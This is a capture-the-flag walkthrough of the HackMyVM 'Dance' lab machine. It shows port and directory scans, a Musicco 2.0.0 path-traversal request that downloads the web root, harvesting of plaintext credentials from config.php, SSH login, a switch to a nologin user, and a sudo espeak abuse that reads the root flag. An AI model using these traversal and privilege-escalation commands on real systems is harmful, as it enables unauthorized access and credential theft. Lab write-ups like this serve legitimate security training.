HackMyVm Dance Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Dance
Scan ports first.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
...
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelScan port 80, found /music.
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 121]
/music (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]Enter /music in web browser, check information, it's a web app called musicco.
image-20210914101829803.png
Search exploit of musicco.
```bash
~ searchsploit musicco
Exploit Title | Path
Musicco 2.0.0 - Arbitrary Directory Download | php/webapps/45830.txt
Through the exploit, we can download the whole html dir as a zip file.
```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zipUnzip var.zip, check /music/config.php, get some credentials.
```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
array('admin', 'admin', 'true'),
array('guest', 'guest', 'false'),
array('aria', 'seraphim', 'false'),
array('alice', 'rememberyou', 'false'),
array('ava', 'password', 'false'),
array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>
We can login ssh as user aria.
```bash
~ ssh aria@192.168.56.100
aria@dance:~$ id
uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)Another user is alba, but it's nologin.
```bash
aria@dance:~$ cat /etc/passwd|grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin
So we need to set the login shell for alba, then escalate to user alba.
```bash
aria@dance:~$ su -s /bin/bash alba
Password:
alba@dance:/home/aria$ id
uid=1001(alba) gid=1001(alba) groups=1001(alba)Check sudo -l.
alba@dance:/home/aria$ sudo -l
Matching Defaults entries for alba on dance:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User alba may run the following commands on dance:
(root) NOPASSWD: /usr/bin/espeakThe last step is to use espeak to read (or listen to) /root/root.txt.
```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'
...